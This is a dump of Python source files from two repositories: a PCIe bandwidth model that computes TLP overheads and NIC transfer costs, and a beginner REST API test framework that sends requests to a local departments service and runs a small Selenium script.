if not ver in TLP_bw:
TLP_bw[ver] = {}
if not lanes in TLP_bw[ver]:
TLP_bw[ver][lanes] = {}
ack_overhead = float(Ack_Size) / float(Ack_Limits[ver][lanes][mps])
fc_overhead = float(FC_Size) / float(FC_Guide[ver][lanes][mps])
skip_overhead = float(SKIP_Length) / float(SKIP_Interval)
overheads = ack_overhead + fc_overhead + skip_overhead
# deduct overheads for ACKs and FC updates
TLP_bw[ver][lanes][mps] = Raw[ver][lanes] - Raw[ver][lanes] * overheads
# TLP Types
TLP_Hdr = 4 # 4 byte generic TLP header
TLP_MWr_32_Hdr = 8 # Mem Write 4 byte for address + 4 bytes
TLP_MWr_64_Hdr = 12 # Mem Write 8 byte for address + 4 bytes
TLP_MRd_32_Hdr = 8 # Mem Read 4 byte for address + 4 bytes
TLP_MRd_64_Hdr = 12 # Mem Read 8 byte for address + 4 bytes
TLP_Msg = 16 # Message Request Header
TLP_Cpl_Hdr = 8 # Completion no Data 4 bytes completer ID + extra
TLP_CplD_Hdr = 8 # Completion with Data 4 bytes completer ID + extra
TLP_Dig = 4 # Optional digest trailer, 4 bytes, e.g. for ECRC
# There are a few other TLP Types (MRdLk, IORd, IOWr CfgRd0, CfgRd1,
# CfgWr0, CfgWr1, CplLk, CplDLk) which we ignore for now
# Indexed by address size and optional ECRC
TLP_MWr_Hdr_Szs = {
32: {0: DLLP_Hdr + TLP_Hdr + TLP_MWr_32_Hdr,
1: DLLP_Hdr + TLP_Hdr + TLP_MWr_32_Hdr + TLP_Dig},
64: {0: DLLP_Hdr + TLP_Hdr + TLP_MWr_64_Hdr,
1: DLLP_Hdr + TLP_Hdr + TLP_MWr_64_Hdr + TLP_Dig}
}
TLP_MRd_Hdr_Szs = {
32: {0: DLLP_Hdr + TLP_Hdr + TLP_MRd_32_Hdr,
1: DLLP_Hdr + TLP_Hdr + TLP_MRd_32_Hdr + TLP_Dig},
64: {0: DLLP_Hdr + TLP_Hdr + TLP_MRd_64_Hdr,
1: DLLP_Hdr + TLP_Hdr + TLP_MRd_64_Hdr + TLP_Dig}
}
TLP_CplD_Hdr_Szs = {
0: DLLP_Hdr + TLP_Hdr + TLP_CplD_Hdr,
1: DLLP_Hdr + TLP_Hdr + TLP_CplD_Hdr + TLP_Dig
}
# SIze of a sending a MSI
MSI_SIZE = 4
class Cfg():
"""A glorified struct to represent a specific PCIe device configuration"""
def __init__(self, version, lanes, addr, ecrc,
mps, mrrs, rcb, rcb_chunks=False):
"""Use this class as a struct for the PCI configuration
@param version: String, 'gen1', 'gen2' 'gen3', 'gen4', 'gen5'
@param lanes: String, 'x1', 'x2', 'x4, 'x8', 'x16', 'x32'
@param addr: either 32 or 64. What type of addresses to use
@param ecrc: either 0 or 1, indicating if ECRC was configured
@param mps: Maximum Payload Size configured
@param mrss: Maximum Read Request Size configured
@param rcb: Read Completion Boundaries
@param rcb_chunks: Boolean, are read requests chopped into RCB or MPS
"""
if version not in Vers:
raise Exception("Unknown PCIe version: %s" % version)
self.version = version
if lanes not in Laness:
raise Exception("Unknown Lane configuration: %s" % lanes)
self.lanes = lanes
if addr not in [32, 64]:
raise Exception("Unknown address lenght: %d" % addr)
self.addr = addr
if ecrc not in [0, 1]:
raise Exception("Unknown ECRC value: %d" % ecrc)
self.ecrc = ecrc
if mps not in MPSs:
raise Exception("Unknown MPS value: %d" % mps)
self.mps = mps
if mrrs not in MRRSs:
raise Exception("Unknown MRRS value: %d" % mps)
self.mrrs = mrrs
if rcb not in RCBs:
raise Exception("Unknown RCB value: %d" % mps)
self.rcb = rcb
self.rcb_chunks = rcb_chunks
# derive Header Sizes for Memory Write, Read and Completion
self.TLP_MWr_Hdr_Sz = TLP_MWr_Hdr_Szs[addr][ecrc]
self.TLP_MRd_Hdr_Sz = TLP_MRd_Hdr_Szs[addr][ecrc]
self.TLP_CplD_Hdr_Sz = TLP_CplD_Hdr_Szs[ecrc]
self.TLP_bw = TLP_bw[version][lanes][mps]
self.RAW_bw = Raw[version][lanes]
def pp(self):
"""Print the configuration"""
print("PCIe configuration: Version=%s, Lanes=%s" % (self.version, self.lanes))
print(" mps=%s, mrrs=%s, rcb=%s, rcb_chunks=%s" % \
(self.mps, self.mrrs, self.rcb, self.rcb_chunks))
print(" addr=%d ecrc=%d" % (self.addr, self.ecrc))
print(" => TLP BW=%.2f Gb/s" % (self.TLP_bw))
## Functions to calculate PCIe bandwidth for different PCIe
## configurations and operations.
# Direction of Transfer from the device perspective
DIR_RX = 1
DIR_TX = 2
DIR_BOTH = DIR_RX | DIR_TX
class BW_Spec():
"""
All functions take a object of this class as a argument. It
specifies bandwidth for the configuration. Bandwidth is either
RAW TLP level bandwidth and the function will work out a effective
bandwidth which can be achieved with it. Effective bandwidth is
the ratio of data bytes versus the bytes actually transmitted
(data bytes + overhead).
Or, the bandwidth specification dictates a effective bandwidth to be
achieved and the model will work out the required raw bandwidth.
Bandwidth is specified in both direction, RX and TX, from the device
perspective.
This is basically a glorified struct.
"""
BW_RAW = 0
BW_EFF = 1
def __init__(self, rx_bw=0.0, tx_bw=0.0, bw_type=0):
self.rx_bw = rx_bw
self.tx_bw = tx_bw
if bw_type not in [self.BW_RAW, self.BW_EFF]:
raise Exception("Unknown BW type")
self.type = bw_type
return
class BW_Res():
"""
A Bandwidth result object returned by all functions. Contains the
required Raw TLP bandwidth and the effective bandwidth in each
direction. RX and TX are always seen from the PCIe peer
initiating the transfer.
Another glorified struct
"""
def __init__(self, rx_raw, rx_eff, tx_raw, tx_eff):
self.rx_raw = rx_raw
self.rx_eff = rx_eff
self.tx_raw = tx_raw
self.tx_eff = tx_eff
if __name__ == '__main__':
# Print out some useful data
for mps in [128, 256]:
for ver in Vers:
print("PCIe Version:", ver)
print("Lanes Phys BW (Gb/s) Data BW (Gb/s) MPS=%d" % mps)
for lanes in Laness:
print("%5s %6.2f %6.2f" % \
(lanes, Raw[ver][lanes],
TLP_bw[ver][lanes][mps]))
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,462
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/__init__.py
|
__all__ = [
"eth",
"mem_bw",
"niantic",
"pcie",
"simple_nic",
]
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,463
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/simple_nic.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A simple NIC model"""
import math
from . import pcie
from . import util
# pylint: disable=invalid-name
# pylint: disable=bad-whitespace
def bw(pcicfg, bwspec, direction, pkt_size):
"""
This code estimates the PCIe bandwidth requirements for a very simple NIC.
@param pcicfg PCIe configuration
@param bwspec Bandwidth specification
@param pkt_size Size of the Ethernet frame (subtract 4 to calculate
with FCS stripping)
@returns A BW_Res object
We assume that descriptors are 128bit in size and a single RX and TX ring.
TX from the host:
1. Host updates the TX queue tail pointer (PCIe write: rx)
2. Device DMAs descriptor (PCIe read: rx/tx)
3. Device DMAs packet content (PCIe read: rx/tx)
4. Device generates interrupt (PCIe write: tx)
5. Host reads TX queue head pointer (PCIe read: rx/tx)
RX to the host:
1. Host updates RX Queue Tail Pointer -> free buf (PCIe write: rx)
2. Device DMAs descriptor from host (PCIe read: rx/tx)
3. Device DMAs packet to host (PCIe write: tx)
4. Device writes back RX descriptor (PCIe write: tx)
5. Device generates interrupt (PCIe write: tx)
6. Host reads RX queue head pointer (PCIe read: rx/tx)
We assume these steps are performed for every packet.
"""
tx_desc_sz = 16
rx_desc_sz = 16
rx_desc_wb_sz = 16
ptr_sz = 4
if not direction & pcie.DIR_BOTH:
raise Exception("Unknown Direction %d" % direction)
data_B = pkt_size
# Packet TX
tx_rx_data_B = 0 # bytes for TX received by the device
tx_tx_data_B = 0 # bytes for TX transmitted by the device
# H: tail pointer write
tx_rx_data_B += ptr_sz + pcicfg.TLP_MWr_Hdr_Sz
# D: read descriptor
_rd_sz = tx_desc_sz
tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mrrs)))
tx_tx_data_B += tlps * pcicfg.TLP_MRd_Hdr_Sz
if pcicfg.rcb_chunks:
tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.rcb)))
else:
tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mps)))
tx_rx_data_B += (tlps * pcicfg.TLP_CplD_Hdr_Sz) + _rd_sz
# D: data DMA reads
tlps = int(math.ceil(float(data_B) / float(pcicfg.mrrs)))
tx_tx_data_B += tlps * pcicfg.TLP_MRd_Hdr_Sz
if pcicfg.rcb_chunks:
tlps = int(math.ceil(float(data_B) / float(pcicfg.rcb)))
else:
tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
tx_rx_data_B += (tlps * pcicfg.TLP_CplD_Hdr_Sz) + data_B
# D: send IRQ
tx_tx_data_B += pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz
# H: read head pointer
tx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz
tx_tx_data_B += ptr_sz + pcicfg.TLP_CplD_Hdr_Sz
# done
# Packet RX
rx_rx_data_B = 0 # bytes for RX received by the device
rx_tx_data_B = 0 # bytes for RX transmitted by the device
# H: tail pointer write
rx_rx_data_B += ptr_sz + pcicfg.TLP_MWr_Hdr_Sz
# D: read descriptors
rx_tx_data_B += pcicfg.TLP_MRd_Hdr_Sz
rx_rx_data_B += rx_desc_sz + pcicfg.TLP_CplD_Hdr_Sz
# D: DMA write
tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
rx_tx_data_B = (tlps * pcicfg.TLP_MWr_Hdr_Sz) + data_B
# D: Write back descriptors
rx_tx_data_B += rx_desc_wb_sz + pcicfg.TLP_MWr_Hdr_Sz
# D: send IRQ (Depending on setting)
rx_tx_data_B += pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz
# H: read head pointer
rx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz
rx_tx_data_B += ptr_sz + pcicfg.TLP_CplD_Hdr_Sz
# done
# we now know how many bytes are transfered in each direction for
# both RX and TX. Lets work out how much we can transfer etc.
return util.gen_res(bwspec, direction, data_B,
tx_rx_data_B, tx_tx_data_B, rx_rx_data_B, rx_tx_data_B)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,464
|
pcie-bench/pcie-model
|
refs/heads/master
|
/pcie_bw.py
|
#! /usr/bin/env python3
#
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A simple script to generate data for PCIe and ethernet bandwidth estimates"""
import sys
from optparse import OptionParser
from model import pcie, eth, mem_bw
# pylint: disable=too-many-locals
OUT_FILE = "pcie_bw.dat"
def main():
"""Main"""
usage = """usage: %prog [options]"""
parser = OptionParser(usage)
parser.add_option('--mps', dest='MPS', type="int", action='store',
default=256,
help='Set the maximum payload size of the link')
parser.add_option('--mrrs', dest='MRRS', type="int", action='store',
default=512,
help='Set the maximum read request size of the link')
parser.add_option('--rcb', dest='RCB', type="int", action='store',
default=64,
help='Set the read completion boundary of the link')
parser.add_option('--lanes', dest='lanes', type="string", action='store',
default='x8',
help='Set num lanes (x2, x4, x8, x16, or x32)')
parser.add_option('--gen', dest='gen', type="string", action='store',
default='gen3',
help='Set PCIe version (gen1, gen2, gen3, gen4, or gen5)')
parser.add_option('--addr', dest='addr', type="int", action='store',
default=64,
help='Set the number of address bits (32 or 64)')
parser.add_option('--ecrc', dest='ecrc', type="int", action='store',
default=0,
help='Use ECRC (0 or 1)')
parser.add_option('-o', '--outfile', dest='FILE',
default=OUT_FILE, action='store',
help='File where to write the data to')
(options, _) = parser.parse_args()
pciecfg = pcie.Cfg(version=options.gen,
lanes=options.lanes,
addr=options.addr,
ecrc=options.ecrc,
mps=options.MPS,
mrrs=options.MRRS,
rcb=options.RCB)
print("PCIe Config:")
pciecfg.pp()
ethcfg = eth.Cfg('40GigE')
tlp_bw = pciecfg.TLP_bw
bw_spec = pcie.BW_Spec(tlp_bw, tlp_bw, pcie.BW_Spec.BW_RAW)
dat = open(options.FILE, "w")
dat.write("\"Payload(Bytes)\" "
"\"PCIe Write BW\" "
"\"PCIe Write Trans/s\" "
"\"PCIe Read BW\" "
"\"PCIe Read Trans/s\" "
"\"PCIe Read/Write BW\" "
"\"PCIe Read/Write Trans/s\" "
"\"40G Ethernet BW\" "
"\"40G Ethernet PPS\" "
"\"40G Ethernet Frame time (ns)\" "
"\n")
for size in range(1, 1500 + 1):
wr_bw = mem_bw.write(pciecfg, bw_spec, size)
rd_bw = mem_bw.read(pciecfg, bw_spec, size)
rdwr_bw = mem_bw.read_write(pciecfg, bw_spec, size)
wr_trans = (wr_bw.tx_eff * 1000 * 1000 * 1000 / 8) / size
rd_trans = (rd_bw.rx_eff * 1000 * 1000 * 1000 / 8) / size
rdwr_trans = (rdwr_bw.tx_eff * 1000 * 1000 * 1000 / 8) / size
if size >= 64:
eth_bw = ethcfg.bps_ex(size) / (1000 * 1000 * 1000.0)
eth_pps = ethcfg.pps_ex(size)
eth_lat = 1.0 * 1000 * 1000 * 1000 / eth_pps
dat.write("%d %.2f %.1f %.2f %.1f %.2f %.1f %.2f %d %.2f\n" %
(size,
wr_bw.tx_eff, wr_trans,
rd_bw.rx_eff, rd_trans,
rdwr_bw.tx_eff, rdwr_trans,
eth_bw, eth_pps, eth_lat))
else:
dat.write("%d %.2f %.1f %.2f %.1f %.2f %.1f\n" %
(size,
wr_bw.tx_eff, wr_trans,
rd_bw.rx_eff, rd_trans,
rdwr_bw.tx_eff, rdwr_trans))
dat.close()
if __name__ == '__main__':
sys.exit(main())
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,465
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_students.py
|
from Base.base_tools import BaseTools
class ResourceStudent(BaseTools):
# 学生查询所有
def resource_get_student_all(self):
pass
# 学生查询 指定
def resource_get_student_one(self):
pass
# 学生查询 list
def resource_get_student_list(self):
pass
# 学生查询 模糊
def resource_get_student_partial(self):
pass
# 学生查询 组合
def resource_get_student_combo(self):
pass
# 学生新增
def resource_add_student(self):
pass
# 学生更新
def resource_update_student(self):
pass
# 学生删除
def resource_delete_student(self):
pass
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,466
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/__init__.py
|
# 服务器ip和端口号
server_port="http://127.0.0.1:8000/api/departments/"
"""
学院信息:
"""
# 查询学院所有
depart_url_all=server_port
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,467
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test01.py
|
import json
import requests
# 查询学院所有
# str=requests.get('http://127.0.0.1:8000/api/departments/')
# # 断言状态码是否为200
# print("获取状态码:",str.status_code)
# print("获取的json值为:",str.json())
# 查询学院指定
# str=requests.get(url='http://127.0.0.1:8000/api/departments/T03/')
#
# print(str.status_code)
# print(str.url)
# dec={'dep_id': 'T03', 'dep_name': 'C++学院', 'master_name': 'C++-Master', 'slogan': 'Here is Slogan'}
# dec={'dep_id': 'T03'}
# dec="T03"
# str=str.json()
# dec=json.dumps(dec)
# print("类型为:",type(str))
# print(str)
# try:
# assert dec == str
# print("断言成功,相等")
# except:
# print("断言失败,不相等")
# 查询学院 list
# str=requests.get(url='http://127.0.0.1:8000/api/departments/',params={"$dep_id_list":"T03,T04"})
# print(str.status_code)
# print(str.url)
# print(str.json())
# 查询学院 组合
# :http://127.0.0.1:8000/api/departments/?slogan=Here is Slogan&master_name=Test-Master&dep_name=Test学院
# url="http://127.0.0.1:8000/api/departments/"
# params={"slogan":"Here is Slogan","master_name":"Test-Master","dep_name":"Test学院"}
# str=requests.get(url=url,params=params)
# print("url:",str.url)
# print(str.text)
# 学院新增
# data=json.dumps( {
# "data": [
# {
# "dep_id":"T010_02",
# "dep_name":"Test01学院",
# "master_name":"Test-Master",
# "slogan":"Here is Slogan"
# }
# ]
# })
#
# headers = {'content-type': 'application/json'}
# # str=requests.post("http://127.0.0.1:8000/api/departments/",data=data,headers=headers)
# # print("新增后数据为:",str.text)
#
# # 学院更新
# url="http://127.0.0.1:8000/api/departments/T010_02/"
# data=json.dumps( {
# "data": [
# {
# "dep_id": "T010_02",
# "dep_name": "C-java学院",
# "master_name": "C++-Master",
# "slogan": "Here is Slogan"
# }
# ]
# })
# str=requests.put(url=url,data=data,headers=headers)
# print(str.url)
# print(str.status_code)
# print(str.headers)
# str=str.text
# print(str)
# try:
# assert "C-java学院" in str
# print("断言成功")
# except:
# print("失败")
# 删除学院
# url="http://127.0.0.1:8000/api/departments/T010_02/"
# str=requests.delete(url)
# print(str.status_code)
# print("请求url为:",str.url)
# print("返回值为:",str.text)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,468
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/write_yaml.py
|
import yaml
data={
"data": [
{
"dep_id":"T01",
"dep_name":"Test学院",
"master_name":"Test-Master",
"slogan":"Here is Slogan"
}
]
}
def write_yaml():
with open("../Data/depart_add.yml","w",encoding="utf-8") as f:
yaml.dump(data,stream=f,encoding="utf-8",allow_unicode=True)
if __name__ == '__main__':
write_yaml()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,469
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_depart.py
|
import json
from Base.base_tools import BaseTools
import Resources
class ResourceDepart(BaseTools):
# 拼接url 封装
def resource_condition(self,condition=None,id=None):
if condition is not None:
url=Resources.depart_url_all+"?"+condition
return self.get_method( url )
elif id is not None:
# 拼接url 查询指定、更新、删除 使用
url = Resources.depart_url_all + id + '/'
return url
# 学院查询所有
def resource_get_depart_all(self):
# 查询学院 所有
return self.get_method(Resources.depart_url_all)
# 学院查询 指定
def resource_get_depart_one(self,id):
url=self.resource_condition(id=id)
return self.get_method(url)
# 学院查询 list
def resource_get_depart_list(self,condition):
return self.resource_condition( condition=condition )
# 学院查询 模糊
def resource_get_depart_partial(self,condition):
return self.resource_condition( condition=condition )
# 学院查询 组合
def resource_get_depart_combo(self,condition):
return self.resource_condition( condition=condition )
# 学院新增
def resource_add_depart(self,data):
# 获取url
url=Resources.depart_url_all
return self.post_method(url,data)
# 学院更新
def resource_update_depart(self,id,data):
# id:要更新的资源;data:更新的json串
url=self.resource_condition(id=id)
return self.put_method(url,data)
# 学院删除
def resource_delete_depart(self,id):
# id要删除的资源
url = self.resource_condition( id=id )
return self.delete_method(url)
# 获取响应id
def resource_get_depid(self,dect):
dect=json.load(dect)
str=dect.get("create_success").get("results")[0]
print("json.load值为:",str)
return str
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,470
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/base_tools.py
|
import json
import requests
class BaseTools():
# 获取结果
def get_result(self,str):
"""
:param str: 服务器响应结果
:return: 返回字典格式 键名内容:url、status、json、text、headers
"""
result={}
# 请求rul
result['url']=str.url
# 服务器响应HTTP状态码
result['status']=str.status_code
# 响应数据为json格式
result['json']=str.json()
# 响应数据为text格式
result['text']=str.text
# 响应信息头
result['headers']=str.headers
# 以字节的方式
result['content']=str.content
# 编码格式
result['encoding']=str.encoding
# 返回字典
return result
# 查询接口
def get_method(self,url,params=None):
"""
:param url: 请求接口地址
:param params: 带参数请求,格式为字典 如:{"id":"T01"}
:return: 返回字典格式 键名内容:url、status、json、text、headers
"""
str=None
# 调用 get方法
str=requests.get(url,params,timeout=5)
# 返回响应结果
return self.get_result(str)
# 新增接口
def post_method(self,url,data=None):
"""
:param url: 请求url
:param data: json报文,格式为字典
:return: 返回字典格式 键名内容:url、status、json、text、headers
"""
if data is not None:
# 序列化将字典转化为通用的json格式
data=json.dumps(data)
# 设置信息头
headers = {'content-type': 'application/json'}
# 调用post方法
str=requests.post(url=url,data=data,headers=headers,timeout=5)
# 返回 响应结果
return self.get_result(str)
# 更新接口
def put_method(self,url,data):
"""
:param url:
:param data:
:return: 返回字典格式 键名内容:url、status、json、text、headers
"""
if data is not None:
# 序列化将字典转化为通用的json格式
data=json.dumps(data)
# 设置信息头
headers = {'content-type': 'application/json'}
# 调用put方法
str=requests.put(url=url,data=data,headers=headers,timeout=5)
# 返回响应结果
return self.get_result(str)
# 删除接口
def delete_method(self,url):
"""
:param url: 请求url
:return: 返回字典格式 键名内容:url、status、json、text、headers
"""
# 调用 delete方法
str=requests.delete(url=url)
# 返回响应结果
# return self.get_result(str)
return str
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,471
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test03.py
|
#encoding=utf-8
import json
import requests
# 查询所有学院
url="http://127.0.0.1:8000/api/departments/"
# 调用GET请求
# response=requests.get(url)
# 以text形式获取结果
# result=response.json()
# print(result)
# code=response.status_code
# print(code)
# response.raise_for_status()
# print(response.content)
# print(response.url)
# print(response.apparent_encoding)
# print(response.headers)
# flag= response.status_code == requests.codes.ok
# print(flag)
# params={"$dep_id_list":"T01"}
params={"$dep_id_list":"T01,T03"}
r=requests.get(url,params=params)
print(r.content)
# r.encoding='utf-8'
print(r.encoding)
print(r.json())
print(r.url)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,472
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/read_yml_test.py
|
import yaml,os,sys
sys.path.append(os.getcwd())
class ReadYaml():
# def __init__(self,file_name):
# self.file_name=os.getcwd()+os.sep+"Data"+os.sep+file_name
#
# def read_yaml(self):
# with open(self.file_name,"r",encoding="utf-8") as f:
# return yaml.load(f)
def read_yaml1(self):
with open("../Data/depart_data.yml","r",encoding="utf-8") as f:
return yaml.load(f)
if __name__ == '__main__':
print(ReadYaml().read_yaml1().get("text_depart_add").get("data")[0].get("dep_id"))
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,473
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_in.py
|
from Resources.resource_classes import ResourceClass
from Resources.resource_depart import ResourceDepart
from Resources.resource_students import ResourceStudent
class ResourceIn():
# 学院统一入口类
def get_depart(self):
return ResourceDepart()
# 班级统一入口类
def get_class(self):
return ResourceClass()
# 学生统一入口类
def get_student(self):
return ResourceStudent()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,474
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test07_PUT.py
|
import json
import requests
# 定义url
url="http://127.0.0.1:8000/api/departments/T0111/"
# 定义报文
data={
"data": [
{
"dep_id": "T0111",
"dep_name": "Test学院updata",
"master_name": "Test-Master",
"slogan": "Here is Slogan"
}
]
}
# 指定请求信息头
headers={'content-type': 'application/json'}
# 请求
r=requests.put(url,data=json.dumps(data), headers=headers)
# 获取响应状态码
print(r.status_code)
# 以文本形式获取响应数据
print(r.text)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,475
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test05.py
|
from time import sleep
from selenium.webdriver.common.action_chains import ActionChains
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
driver=webdriver.Firefox()
url="file:///E:/%E8%AF%BE%E5%A0%82/WebDriver/%E6%B3%A8%E5%86%8CA.html"
driver.get(url)
username=driver.find_element_by_xpath("//*[@id='userA']")
# username.send_keys("admin")
print("元素为:",username)
ActionChains(driver).context_click(username).perform()
username.send_keys('p')
# username.send_keys("alt")
sleep(3)
driver.close()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,476
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/read_yml.py
|
import yaml,os
class ReadYaml():
def __init__(self,file_name):
self.file_name=os.getcwd()+os.sep+"Data"+os.sep+file_name
def read_yaml(self):
with open(self.file_name,"r",encoding="utf-8") as f:
return yaml.load(f)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,477
|
LGY2008/Restful_Depart_Interface
|
